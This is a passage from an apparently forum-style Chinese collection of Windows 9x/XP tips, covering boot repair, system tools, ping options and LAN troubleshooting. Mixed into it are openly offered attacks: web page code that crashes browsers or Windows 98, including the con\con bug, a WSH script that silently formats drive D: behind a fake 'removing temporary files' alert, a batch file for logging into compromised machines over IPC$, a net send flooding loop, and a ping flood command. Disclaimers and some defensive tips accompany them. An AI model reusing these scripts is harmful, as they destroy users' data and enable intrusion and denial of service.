XP時設置的管理員密碼,回車,出現D:Windows〉,這時需要輸入修復命令Fixboot,後面的參數為啟動扇區要寫入的磁碟盤符,這裡填入C:,回車。修復完成,鍵入Exit退出。重啟後就會看到久違的雙重啟動菜單了。並且,這樣修復後基本不產生垃圾文件。因為這兩個問題是非常非常普遍的,所以我就收集到這裡了~28)這裡說幾個主頁惡意代碼:『並不是讓大家把這些代碼加入到自己的主頁中!只是希望大家能了解惡意代碼,起到更好的防護作用!』A、死循環代碼:『把下列代碼加入到網頁中,可達到如上效果』<img src=javascript:location=「網頁的文件名.htm:」>說明:當含有這段代碼的網頁被人點擊,連接就會不斷的打開IE瀏覽器,直到你的系統資源浪費到0%~只有重新啟動才能正常使用!預防方法:禁用所有的ActiveX控制項和插件!因為這是一個ActiveX教本程序~B、恐怖的大圖片:『把下列代碼加入到網頁中,可達到如上效果』<img src= "http://恐怖圖片的連接地址" width_= "1" height= "100000000000000000000000">說明:當打開這樣的網頁,IE會不斷的解釋試圖打開,但由於圖片實在太大,超出了其處理能力,所以……C、地震死機代碼:『把下列代碼加入到網頁中,可達到如上效果』<script>if (window.top.moveBy){for (i = 1;i < 50; i++){for (j = 3;j > 0; j--){window.top.moveBy(0,i);window.top.moveBy(i,0);window.top.moveBy(0,-i*2);window.top.moveBy(-i*2,0);window.top.moveBy(0,i);window.top.moveBy(i,0);}}}</script><img src="c:concon">說明:<img src="c:concon">是windows9x的設備名稱解析漏洞!WINDOWS9x的concon設備名稱解析漏洞允許用戶進行攻擊,倒是98死機。原理:我們知道,CON是DOS下的特殊設備名,不允許做文件名,如果我們在DOS下鍵入如下命令:copy coldcrysky.txt con,系統會顯示coldcrysky.txt的內容,如果換成:copy coldcrysky.txt>con系統會提示文件不能拷貝到文件自身。如果吧con換成LPT或PRN,則輸出coldcrysky.txt到印表機。由此可見,CON代表文件本身,如果使用CONCON命令,則意味著系統不斷調用文件本身,視系統資源迅速枯竭,連按CTRL+ALT+DEL的機會都沒有~解決辦法:對於9X系統,強烈建議打補丁!!!2000和XP則不會死機~D、格式化硬碟:(最恐怖的~~~慎用!!!請勿用於非法用途!!!使用後如果有任何負作用,後果自負!與傷寒天空『ColdCrySky』;亂刀留影無關!!!)scr,Reset();scr.Path="C:\WINDOWS\StartMenu\Programs\啟動\startup.htm";scr.Doc="<object id=`wsh` classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`>"WSH.rUN(`start/m format.com d:/q/autotest/u`);alert(`IMPORTANT : Windows is removing unused temporary files.`);scr.write();說明:當您瀏覽了網頁,會把startup.hta文件寫入啟動文件夾,並提示WINDOWS正在刪除臨時文件!實際上是在格式化你的D盤,代碼中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B對應為:Windows Scripting Host Shell Object。代碼中的:WSH全稱是:Windows Scripting Host,是微軟的一種基於32位系統平台與語言無關的教本解釋機制,它使得腳本能在WINDOWS桌面或命令提示符下運行~WSH所對應的程序WScript.exe是一個腳本語言解釋器,位於WINDOWS所在文件夾下,所以它可以像執行批處理文件一樣執行WSH腳本程序~解決方法:1)更新您的瀏覽器,使用最新的瀏覽器上網!2)修改msdos.sys,在其中加入:Bootmentu=0命令行,目的是禁用啟動菜單。3)吧format.com改名4)禁用WSH。具體方法:在win98中,從添加刪除程序中點擊WINDOWS安裝程序,打開附件一項,將WINDOWS SCRIPTING HOST前面的選項去掉,就可以卸載掉WSH了~~~win2000和xp的用戶可以在我的電腦-工具菜單-文件夾選項-選擇文件類型,找到VBS VBSCRIPT FILE選項,點擊刪除!29)系統自帶的系統工具其實無論大家從什麼地方,什麼方法找到一些好用的工具,都不如Windows自帶的工具用著方便(假設你區的地方正好不能上網,而你又沒有準備好這些工具,那怎麼辦?呵呵,不用著急,用好下面幾個Windows自帶的小工具,可以使你事半功倍!)1、msinfo32.exe位於C:Program FilesCommon FilesMicrosoft SharedMsinfomsinfo32.exe,顯示計算機中的有關係統信息,可用其診斷、解決計算機問題並查看遠程系統所生成的系統報告。2、drwatson.exe --這個工具給我特別的親密感覺:第一次使用這個工具是在看了LK007大哥給cool兄弟的回復以後,我馬上試驗~果然很有意思!LK007不愧是大哥!現在想起來都佩服不已~~~位於C: Windows drwatson.exe,當某個應用程序在運行過程中出錯時,它就會將出錯的程序以及出錯的內存地址一一記錄下來,並保存為Windows的Drwatson子目錄下的*.wlg記錄文件。3、sfc.exe位於C:WindowsSystemsfc.exe,用於自動搜索被改變、刪除或損壞了的系統文件。4、msconfig.exe位於C:WindowsSystemmsconfig.exe,通過修改啟動方式以及啟動時運行哪些應用程序等系統配置,從而達到快速排除故障的目的。5、scanreg.exe位於C:windowscommandscanreg.exe(DOS版本)及C:windowsscanregw.exe(Windows版本),用於檢查、修復、備份以及還原系統註冊表及相關配置文件的工具軟體,防止因註冊表數據被破壞而導致的系統故障。6、vcmui.exe位於C:Windowsvcmui.exe,在後台自動將被覆蓋的驅動程序備份下來,當我們安裝的新驅動出錯時可用它進行恢復。7、winrep.exe位於C:Windowswinrep.exe,能自動收集有關係統信息並提示用戶輸入故障所在,幫我們編寫一篇完整的「求援」報告,並將其發送給有關技術維護人員,簡化「求援」操作。這七個Windows自帶的小程序可以在開始菜單--運行中直接輸入文件名(無需輸入擴展名)調出該程序!31)批處理在入侵中的幾則妙用!A、簡化IPC$登陸肉雞的操作:用記事本建立一個名字為:ipcruqin.bat的批處理文件,內容如下:@net use \%1ipc$ %3 /u:"%2"@echo OK!已經成功建立連接之後,大家在CMD下輸入:ipcruqin.bat 肉雞IP 肉雞的admin帳號/用戶的密碼。就可以登陸上去了,而不需要那一大長串的命令了!B、批處理轟炸對方電腦:打開一記事本,在裡面輸入如下內容:@echo 正在轟炸中……tart@net send %1 %2@if errorlevel 1 goto overgoto startver@echo 發送失敗將其保存為bat格式的文件即可,使用方法:*.bat(該批處理文件的名字)+ 空格 + 目標IP + 空格 + 你要對他說得話!這次先簡單介紹這三個!等下次有機會再給大家介紹更多的批處理文件的用途!32)再說幾個非常簡單實用的DOS命令(工具):A、fport.exe --查看那些埠都是那些程序使用的命令。B、netstat -an --查看那些埠於外部的IP連接。比如這裡顯示 :23 XX.XX.XX.XX 而你又沒有開23埠,那麼,呵呵……還用我說么?C、letmain.exe \ip -admin -d --列出本機的administrators組的用戶名查看是否有異常。D、pslist.exe --列出進程E、pskill.exe --殺掉進程,有時候再任務管理器中無法終止程序,那就用這個工具來停止進程。F、login.exe --列出當前有那些用戶登陸再你的機器上。ping命令詳解ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list Options: -t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C. 不停的ping地方主機,直到你按下Control-C。 此功能沒有什麼特別的技巧,不過可以配合其他參數使用,將在下面提到。 -a Resolve addresses to hostnames. 解析計算機NetBios名。 示例:C:\>ping -a 192.168.1.21 Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data: Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Ping statistics for 192.168.1.21: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms 從上面就可以知道IP為192.168.1.21的計算機NetBios名為iceblood.yofor.com。 -n count Number of echo requests to send. 發送count指定的Echo數據包數。 在默認情況下,一般都只發送四個數據包,通過這個命令可以自己定義發送的個數,對衡量網路速度很有幫助,比如我想測試發送50個數據包的返回的平均時間為多少,最快時間為多少,最慢時間為多少就可以通過以下獲知: C:\>ping -n 50 202.103.96.68 Pinging 202.103.96.68 with 32 bytes of data: Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Request timed out. ……………… Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Ping statistics for 202.103.96.68: Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds: Minimum = 40ms, Maximum = 51ms, Average = 46ms 從以上我就可以知道在給202.103.96.68發送50個數據包的過程當中,返回了48個,其中有兩個由於未知原因丟失,這48個數據包當中返回速度最快為40ms,最慢為51ms,平均速度為46ms。 -l size Send buffer size. 定義echo數據包大小。 在默認的情況下windows的ping發送的數據包大小為32byt,我們也可以自己定義它的大小,但有一個大小的限制,就是最大只能發送65500byt,也許有人會問為什麼要限制到65500byt,因為Windows系列的系統都有一個安全漏洞(也許還包括其他系統)就是當向對方一次發送的數據包大於或等於65532時,對方就很有可能擋機,所以微軟公司為了解決這一安全漏洞於是限制了ping的數據包大小。雖然微軟公司已經做了此限制,但這個參數配合其他參數以後危害依然非常強大,比如我們就可以通過配合-t參數來實現一個帶有攻擊性的命令:(以下介紹帶有危險性,僅用於試驗,請勿輕易施於別人機器上,否則後果自負) C:\>ping -l 65500 -t 192.168.1.21 Pinging 192.168.1.21 with 65500 bytes of data: Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 ……………… 這樣它就會不停的向192.168.1.21計算機發送大小為65500byt的數據包,如果你只有一台計算機也許沒有什麼效果,但如果有很多計算機那麼就可以使對方完全癱瘓,我曾經就做過這樣的試驗,當我同時使用10台以上計算機ping一台Win2000Pro系統的計算機時,不到5分鐘對方的網路就已經完全癱瘓,網路嚴重堵塞,HTTP和FTP服務完全停止,由此可見威力非同小可。 -f Set Don`t Fragment flag in packet. 在數據包中發送「不要分段」標誌。 在一般你所發送的數據包都會通過路由分段再發送給對方,加上此參數以後路由就不會再分段處理。 -i TTL Time To Live. 指定TTL值在對方的系統里停留的時間。 此參數同樣是幫助你檢查網路運轉情況的。 -v TOS Type Of Service. 將「服務類型」欄位設置為 tos 指定的值。 -r count Record route for count hops. 在「記錄路由」欄位中記錄傳出和返回數據包的路由。 在一般情況下你發送的數據包是通過一個個路由才到達對方的,但到底是經過了哪些路由呢?通過此參數就可以設定你想探測經過的路由的個數,不過限制在了9個,也就是說你只能跟蹤到9個路由,如果想探測更多,可以通過其他命令實現,我將在以後的文章中給大家講解。以下為示例: C:\>ping -n 1 -r 9 202.96.105.101 (發送一個數據包,最多記錄9個路由) Pinging 202.96.105.101 with 32 bytes of data: Reply from 202.96.105.101: bytes=32 time=10ms TTL=249 Route: 202.107.208.187 -> 202.107.210.214 -> 61.153.112.70 -> 61.153.112.89 -> 202.96.105.149 -> 202.96.105.97 -> 202.96.105.101 -> 202.96.105.150 -> 61.153.112.90 Ping statistics for 202.96.105.101: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 10ms, Maximum = 10ms, Average = 10ms 從上面我就可以知道從我的計算機到202.96.105.101一共通過了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97這幾個路由。 -s count Timestamp for count hops. 指定 count 指定的躍點數的時間戳。 此參數和-r差不多,只是這個參數不記錄數據包返回所經過的路由,最多也只記錄4個。 -j host-list Loose source route along host-list. 利用 computer-list 指定的計算機列表路由數據包。連續計算機可以被中間網關分隔(路由稀疏源)IP 允許的最大數量為 9。 -k host-list Strict source route along host-list. 利用 computer-list 指定的計算機列表路由數據包。連續計算機不能被中間網關分隔(路由嚴格源)IP 允許的最大數量為 9。 -w timeout Timeout in milliseconds to wait for each reply. 指定超時間隔,單位為毫秒。 此參數沒有什麼其他技巧。 ping命令的其他技巧:在一般情況下還可以通過ping對方讓對方返回給你的TTL值大小,粗略的判斷目標主機的系統類型是Windows系列還是UNIX/Linux系列,一般情況下Windows系列的系統返回的TTL值在100-130之間,而UNIX/Linux系列的系統返回的TTL值在240-255之間,當然TTL的值在對方的主機里是可以修改的,Windows系列的系統可以通過修改註冊表以下鍵值實現: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters] "DefaultTTL"=dword:000000ff 255---FF 128---80 64----40 32----20 好了,ping命令也基本上完全講解完了,其中還有-j,-k參數我還沒有詳細說明,由於某些原因也包括我自己所收集的資料過少這裡也沒有向大家詳細介紹,請大家見諒,如果在看了這篇文章的朋友當中有知道得比我更多的,以及其他使用技巧的也希望您能告訴我,並在此先謝過。 區域網應用問題專題解答 (Rayi々) 1、問:我訪問區域網中的計算機時,為什麼常常被提示要輸入用戶名和密碼? 答:這主要是為了安全方面的考慮。而且當你重新啟動計算機時又要重新輸入用戶名和密碼,這一點確實讓人會覺得很麻煩。 你只要在需要進行文件共享的計算機上建立一個相同的用戶名,並且使用相同的密碼,然後區域網中的計算機都利用這個用戶名和密碼登錄,這樣在網上鄰居中訪問對方計算機時就不需要輸入用戶名和密碼了。 2、問:上網瀏覽前在區域網中應如何對IE進行設置? 答:在區域網中使用代理伺服器上網瀏覽時,應對瀏覽器進行必要的設置。以IE為例,在瀏覽器中代理伺服器的設置方法為:用滑鼠右擊桌面上的IE圖標,在彈出的右鍵菜單中選擇「屬性」命令。在打開的「Internet 屬性」對話框中選擇「連接」項,然後點擊「區域網設置」,在「區域網(LAN)設置」對話框中選中「使用代理伺服器」,並輸入代理伺服器的地址以及埠。 默認對於HTTP、FTP瀏覽器都是使用相同的代理伺服器設置,如果對這些服務有不同的代理,你就需要進行其他的設置。 方法為:點擊「高級」按鈕,取消「對所有協議均使用相同的代理伺服器」,並分別在不同的服務中輸入各自的地址和埠,保存以上設置後,IE就可以使用代理伺服器上網了。 3、問:在區域網中應如何設置OutLook Express收發郵件? 答:在區域網中OE等電子郵件收發軟體同樣可以通過代理伺服器上網,只是不能再使用原來的單機撥號上網設置。而且相對於其他軟體的代理伺服器設置,郵件軟體的伺服器設置要更為特殊一點,其代理伺服器的類型必須是Socks4或Socks5的伺服器。假設所使用的代理伺服器的地址為:202.102.49.141,用戶的郵件地址為:jjxm@163.com。 那麼在OE中代理伺服器的設置方法為:打開OE後,選擇菜單「工具→賬戶」。在「Internet賬戶」中選擇「郵件」選項卡,然後在賬戶列表中選擇需要設置的賬戶,點擊「屬性」按鈕。在屬性窗口中選擇「伺服器」選項卡(圖1),在接收和發送郵件伺服器地址中輸入代理伺服器的地址(如202.102.49.141),並按「用戶名#郵件真實的收信地址」的命名規則,在賬戶名中輸入 「jjxm#POP3.163.com」,單擊「確定」保存後即可在代理伺服器中收發郵件了。 4、問:在由三台電腦組成的區域網中,我在其中一台電腦上用過Windows優化大師後,為什麼這台電腦就不能登錄網路,並且還提示找不到撥號適配器? 答:根據你說的情況,是沒有安裝「撥號網路」。解決方法是:在「控制面板」的「添加/刪除程序」中,選擇「Windows安裝程序」,在「組件」的「通訊」中選擇「撥號網路」,然後將Windows安裝盤放入光碟機進行安裝,重新啟動計算機後就可使用撥號網路了。 5、問:如何在區域網中設置QQ、ICQ等即時通訊軟體? 答:在QQ的主窗口中點擊「QQ2000」的按鈕,在其主菜單中選擇「系統參數」,在參數窗口中選擇「網路設置」選項卡。首先在「上網類型」中選擇「區域網接入Internet」,再選中「使用Socks5代理伺服器」,然後輸入伺服器的地址以及埠(圖2),如果代理伺服器中設定了用戶密碼,還需要輸入用戶名和密碼。輸入完畢後可以點擊「測試」按鈕來檢測其代理是否正常。最後單擊「確定」即可在代理伺服器中使用QQ了。 類似地,在ICQ中選擇「連接」中的「防火牆」,可以定義多個代理伺服器,如Socks4、Socks5、HTTPS等。你首先要確定並選擇所使用的代理伺服器類型,然後在「代理伺服器」部分輸入主機的地址、埠,如果代理伺服器設置了用戶密碼,還必須輸入用戶名和密碼。對於代理伺服器的類型、地址、埠等,如果你不太清楚,可以詢問網路管理員。 6、問:我想用NetMeeting進行區域網中的通話,應該如何設置? 答:如果你首次打開NetMeeting,軟體會自動啟動配置嚮導。在配置嚮導窗口點擊「下一步」,然後輸入你的基本信息(如姓名、E-mail等)。繼續單擊「下一步」,進入伺服器配置窗口,NetMeeting允許啟動時登錄到目標伺服器,這個功能是針對於普通上網用戶的,區域網用戶並不需要該功能,因此你必須取消該選項。繼續單擊「下一步」,選擇網路速度,必須選擇「區域網」,然後提示是否建立快捷方式,你可以根據需要進行選擇。接下來進行音頻調節測試後就完成了區域網中對NetMeeting的設置。 7、問:我知道在區域網內文件是可以共享的,但我想問的是,印表機和掃描儀應該如何共享? 答:先來說說印表機的共享方法。你可以先在區域網內找一台電腦,並把印表機連接到這台電腦上,然後按照說明書為印表機安裝好驅動程序。在Windows系統任務欄上,點擊「開始→設置→控制面板」,在「控制面板」窗口中雙擊「印表機」圖標,再用滑鼠右鍵單擊印表機圖標,在彈出的右鍵菜單上選擇「共享」,然後在打開的「印表機屬性」窗口上選擇「共享為」,並像共享文件那樣給被共享的印表機也起一個共享名,然後點擊「確定」即可。 關於掃描儀的共享設置,你首先要看一下你的掃描儀是否具有網路共享功能,是否配備了用於共享的驅動程序,也就是說只有部分掃描儀可以進行網路共享。另外不同型號掃描儀的共享設置差異很大,最好查閱一下掃描儀的說明書。 8、我用分機線上網,上網速度最大才48000bps,請問是何原因? 還有,將Modem放在主機箱側面,開機後(未打開Modem電源),家裡的電話就處於忙音狀態,如何解決? 答:第一個問題跟你的分機電話線或線接頭質量有很大關係,另外,如果你的Modem的速度平常都能接近48000bps,你也不要太在意,應該重點先看下它的實際下載速度是否令你滿意。第二個問題,肯定和你主機的電源等配件的電磁輻射強和屏蔽效果差有關,你如果不想對你的主機進行大換血的話,最好用物體在主機和Modem之間進行屏蔽,或將Modem離你的主機遠點,這是最好的辦法。 9、我新購的網卡在電腦上無法安裝,而在其他電腦上卻使用正常,這是怎麼回事? 答:如果在電腦中安裝好網卡後,系統沒有提示找到新硬體,你可運行「添加新硬體嚮導」來讓系統搜索新硬體。方法是單擊「開始」,指向「設置」,單擊「控制面板」,然後再雙擊「添加新硬體」。按照屏幕提示操作。你可選「讓Windows搜索新硬體嗎?」,單擊「是(推薦)」,然後再單擊「下一步」,讓系統找到網卡再安裝其驅動。 而如果出現以下任何現象,網卡或者網卡所在的插槽損壞: 1、「添加新硬體嚮導」檢測不到網卡; 2、「添加新硬體嚮導」能夠檢測到網卡,但無法正常工作。 為了確定到底是網卡還是插槽的問題,可以檢查網卡是否牢靠插入插槽之中。如果網卡已牢靠插入插槽之中,請改插到其他插槽之中試試。如果問題仍未解決,則可能是網卡損壞或與你的電腦不兼容,可更換之。 10、我的電腦出現「網上鄰居」中找不到其他聯網電腦的故障,如何解決? 答:「網上鄰居」是按工作組顯示計算機的。如果你的電腦沒有設置工作組名稱,打開「網上鄰居」時就可能看不到其他電腦。單擊「開始」,指向「設置」,單擊「控制面板」,雙擊「網路」,然後再單擊「標識」選項卡。你區域網中所有電腦「工作組」框中的名稱應為一樣,如有不同你可在此框中鍵入相同的工作組名稱,然後單擊「確定」重啟電腦既可。 此外,如果「網上鄰居」中不出現「整個網路」圖標,可能是在Windows中沒有安裝必要的網路組件。要與網路上的其他計算機連接,則必須安裝以下組件:Microsoft網路客戶、網路適配器、至少一種網路協議(如IPX/SPX、TCP/IP等)。可打開「網路」,檢查「配置」選項卡上的列表,確保已安裝了各種必要的網路組件。如有,你可重新安裝各種缺少的組件即可。 11、問:公司區域網,只有一台機器通過貓接入互聯網,現想其他機器接入互聯網,請問如何實現?答:這是一個比較典型的代理上網問題。你可以在帶貓的機器上安裝代理上網軟體(如Sygate、Wingate、Winproxy)或直接使用Windows自帶的共享上網功能上網(Windows 98第二版以上才帶此功能)。建議使用Sygate,該軟體設置較簡單。先撥號上網,後安裝Sygate,完畢後,Sygate將檢測互聯網的連接狀態,並自動設置。在其他需要代理上網的機器上,指定網關和DNS的 IP地址,步驟為網上鄰居→右鍵→屬性→TCP/IP協議→屬性→DNS,輸入當地ISP的IP地址→網關,輸入代理伺服器的IP地址→確定→重啟。設置完畢後,其他各項應用軟體均無須設置。12、問:區域網通過路由器、使用ADSL方式上網,如何使各工作站快速的獲得可以上網的IP地址而不手工去指定?答:假如使用Windows 2000,可以直接使用Windows 2000自帶的dhcp功能,首先建立一個作用域,然後為這個作用域添加DNS的搜索順序和路由器的IP地址,DNS搜索順序為當地ISP的IP地址,路由器的IP地址即設置成當前區域網的路由器IP地址,其他機器則不指定IP地址,如非使用Windows 2000,則可使用第三方的dhcp軟體,比如代理軟體sygate和wingate都帶有dhcp功能。13、問:公司要組建區域網,需要用到郵件伺服器和WWW伺服器,請問這兩種服務放到一台電腦里還是分別用兩台電腦?都用什麼軟體?謝謝!答:這兩種服務現在用的皆比較廣泛,可以只用一台計算機或用兩台都可以,當然具體根據貴單位的預算開支和流量來決定。假如流量不大的話,建議只使用一台機器即可。至於軟體方面,可以使用Windows 2000作伺服器平台,然後使用Imail或Easymail作為郵件服務軟體,www服務建議使用apache serve軟體,因為Windows 2000自帶的IIS存在許多漏洞,而且不安裝,在建立www伺服器後,需考慮支持的語言腳本,現在用的比較廣的是ASP和PHP,當然,具體使用哪種語言,很簡單,看你自己精通哪方面就使用哪方面的,還有一點你沒提供到的,就是很有必要建立一個ftp服務,你可使用u-ftp軟體,這款軟體在安裝和使用方面都不難。14、問:家裡原先有一台PII的計算機,最近又新增一台P4機器,操作系統都為Windows 98且已安裝網卡,現在我想把他們聯起來共享資源,該怎麼辦?答:你所提的實際上即現在應用的比較廣泛的對等網的連接。很簡單,因你已有網卡,你需做的使是購買適合長度的超五類線和2個RJ45的水晶頭,再去借一把打線鉗。然後再根據標準做一對跳線,即一頭採用T568A標準(具體線的排列是:白綠、綠、白橙、藍、白藍、橙、白棕、棕),另一頭採用T568B標準(白橙、橙、白綠、藍、白藍、綠、白棕、棕)。然後在操作系統中添加TCP/IP協議和Netbuei協議,把工作組設置為workgroup,計算機不能相同。15、問:辦公室機器桌面的「網上鄰居」圖標沒了,能上Internet,但無法瀏覽其他機器上的資源了,怎麼辦?答:說明你的Internet屬性完好,但網上鄰居屬性中的「Microsoft 網路用戶」這一客戶組件沒了。進到「控制面板」中雙擊「網路」,先在彈出的網路對話框中點按「添加」按鈕,再從隨後彈出的「請選擇網路組件類型」對話框中雙擊「客戶」,最後從隨後的「選擇網路客戶機」對話框的左側選擇「Microsoft」後再選擇「Microsoft 網路用戶」,「確定」再「確定」並據提示重啟計算機就ok啦!先回去解決這個問題吧你……16、問:辦公室機器桌面的網上鄰居圖標解決了且也能瀏覽其他機器的共享資源了,但發現右鍵中的「共享」命令沒了!怎麼辦?答:這是因為還缺少個「Microsoft網路上的文件與印表機共享」這一網路服務協議呢!先右擊桌面「網上鄰居」選「屬性」,對話框中點按「添加」按鈕,再從隨後彈出的「請選擇要安裝的網路組件」對話框中雙擊「服務」,最後從隨後的「選擇網路服務」對話框中選擇「Microsoft網路上的文件與印表機共享」,「確定」再「確定」並據提示重啟計算機就ok啦!17、問:右鍵中的「共享」命令已經顯身!但我設了共享不想讓別人從網上鄰居中看到這個共享目錄,只有自己知道且能實現異地機上有完全操作的許可權。答:找到你想要共享的文件夾並右鍵點選「共享…」----這裡我就以共享「D:Windows 98」為例,先選中「共享為」後在共享名「Windows 98(當然也可改名共享哦)」後加一英文狀態的「$」符,再選中「完全」並輸入設定好「密碼」,然後「確定」一次密碼就OK了。這樣一來,絕對保證別人從網上鄰居中看不到這個共享目錄的!那~~自己想從異地機上進入並實現完全操作時怎麼辦呢?呵呵,這麼辦:從異地機的地址欄中鍵入「\(機器名)$(你的共享目錄名)」並「ENTER」,再輸入密碼並確定後,就進入啦!這樣你可靜悄悄地實現異地機上在自己設定的共享目錄內進行完全操作啦!不過注意其中「」不能誤輸入成「/」哦!……好了,你會了嗎?18、問:一塊PCI匯流排的10/100自適應網卡,無法正常工作。主要表現在網路時斷時續,不管是不是Ping自己的IP地址,還是Ping對方的IP地址,都有這種情況發生。查看網卡的指示燈也出現同樣的現象。答:首先你可檢查Hub的連介面是不是出了故障,將該網卡接到其他埠上,如果問題依然如故,說明Hub沒有問題。然後你可用網卡隨盤附帶的測試程序盤查看網卡的有關參數,其IRQ值為5,再回到Windows 95/98操作系統,查看操作系統分配給網卡的參數值,其IRQ同樣應是5。此外,可檢查安裝該網卡的主板插槽是否有故障,你可打開機箱,將網卡換個PCI插槽試試。此外,你還可檢查CMOS參數設置,重新啟動計算機,進入CMOS狀態,選擇「PNP/PCI Configuration」一項,如果IRQ5後面的狀態為「Legacy ISA」(保留的ISA匯流排設備),就應當將IRQ5後面的狀態改為「PCI/ISA PNP」。19、問:我的電腦與一個對等網連接好了,但不能讀別人電腦上的數據,這是怎麼回事?答:可能是你沒有設置好資源共享:選擇「網路→配置→文件及列印共享」,將兩個選項全部打勾並確定,安裝成功的標誌是配置中出現了「Microsoft網路上的文件與印表機共享」選項,注意,還要檢查它與NetBEUI協議是否進行了綁定。選擇「配置」中的NetBEUI協議,點擊「屬性」按鈕,看綁定中「Microsoft網路上的文件與印表機共享」、「Microsoft網路用戶」前是否已經有對勾了。還要在「網路→標識」里將「計算機名」設置好,確定之後系統將重新啟動。20、問:我的網路從集線器升級為交換機後,感覺速度並沒有多大提高,是什麼原因?答:這種情況需要從以下幾個方面來分析:1、首先應確認網路是否工作在100M狀態,具體做法是:確認網線是五類以上線,網線做法遵循100M標準,網卡支持100M工作狀態,只有滿足以上條件,交換機才能工作於100M狀態,從而最大限度地體現交換機的性能優勢。2、如果網路在升級前工作正常,數據交換量不是很大,數據衝突和廣播風暴現象出現的不是很頻繁,那麼升級後網路性能的提升可能不是很明顯,這是正常現象。3、還有一種情況是因為網路結構設置不當引起的,例如,如果把集線器放在第一級連接伺服器,而把交換機放在下一級來連接工作站,這樣數據交換仍然通過集線器進行,交換機的性能優勢沒有體現出來。所以,在組網時應當充分考慮網路結構的合理性,應將性能較好的設備置於整個網路的最高級。21、問:VLAN是什麼意思,使用它有什麼好處?答:VLAN是Virtual Local Area Network的縮寫,即虛擬區域網的意思。VLAN的劃分有三種方式:基於埠(Port)、基於MAC地址和基於IP地址。通過劃分VLAN,可以把數據交換限制在各個虛擬網的範圍內,從而減少整個網路範圍內廣播包的傳輸,提高了網路的傳輸效率;同時各虛擬網之間不能直接進行通訊,而必須通過路由器轉發,起到了隔離埠的作用,為高級安全控制提供了可能,增強了網路的安全性。VLAN功能的適用性很廣,在數據交換較頻繁或對網路安全性有要求的環境均可適用,如:1、在智能小區、校園、企業等應用環境,使用VLAN功能可使不同VLAN間的機器不能互相訪問,可為網路安全控制提供良好保障;2、在遊戲廳、大中型企業等環境,使用VLAN可大大減少網路中不必要的數據交換的數量,杜絕廣播風暴,提升網路傳輸性能。22、問:我的自適應網卡只有紅燈閃爍,綠燈不亮,這種情況正常嗎?答:首先你應該了解一般自適應網卡紅燈和綠燈分別代表什麼含義——紅燈代表Link/Act(連通/工作),即連通時紅燈長亮,傳輸數據時閃爍;綠燈代表FDX(全雙工),即全雙工狀態時亮,半雙工狀態時滅。如果一個半雙工的網路設備(如Hub)和自適應網卡相連,由於這張網卡是自適應網卡,它也會工作在半雙工狀態,所以綠燈不亮也屬於正常情況。23、問:如何使用交換機的UpLink埠,怎樣連接?使用了UpLink口後,是否還可以使用其相鄰最近的埠?答:UpLink口是交換機上常見的一種埠,它是為了便於兩台交換機之間進行級聯的埠。它與其相鄰的普通UTP口使用的是同一通道,因而,如果使用了UpLink口,另一個與之相鄰的普通埠就不能再使用了。這兩個埠稱為共享埠,不能同時使用。級聯的時候,你可使用一般的網線(網線的兩端都遵循同一標準,即同是EIA/TIA 568A或568B)將一個交換機的普通埠和另一個交換機的UpLink口連起來。如兩個設備都使用UpLink口連接,網線需要一端使用EIA/TIA 568A的標準,另一端使用EIA/TIA 568B的標準(如下表)。標準568a 標準568b橙白1 綠白1橙2 綠2綠白 3 橙白3藍4 藍4藍白5 藍白5綠6 橙6棕白7 棕白7棕8 棕8 24、問:我在安裝網卡後,在「系統→設備管理器」中網卡出現黃色的「!」號,請問該如何解決?答:網卡較容易與其他設備發生資源衝突,尤其是在系統中安裝有多個插卡的情況下,解決辦法是:1、更換網卡在主板插槽上的位置是最好的解決辦法。2、在該網卡「屬性」窗口「資源」標籤中找到「資源類型」列表,選定發生衝突的「資源」,按「更改設置」按鈕,更改發生衝突的IRQ中斷號或者I/O地址。3、有些PCI網卡會強行佔用IRQ10,與一些強行佔用IRQ10的顯示卡發生IRQ中斷衝突,如果遇到這種情況,可在BIOS中將「Assign IRQ For VGA」項設置為Disabled,不給顯示卡分配固定的中斷。4、運行網卡附帶的軟盤中的設置程序,將網卡設置為非PNP模式,設置IRQ中斷號和I/O地址為系統未佔用的地址;並在BIOS中將相應中斷號由PCI/ISA改為Legacy ISA。如果使用上述方法均不能解決故障,建議換一塊網卡試試。25.問:ADSL上網網頁打不開的問題?答:是MTU的問題!改一下註冊表!HKEY_LOCAL_MACHINESystemCurrentControlSetServicesClassNetTrans�000主鍵下面建立字元串鍵名為MaxMTU,鍵值為1450查殺I-Worm.Wukill病毒(注意有變種了)的手工方法 (微笑)我是用手工殺的。金山毒霸好象還不行,跟本就不報警。 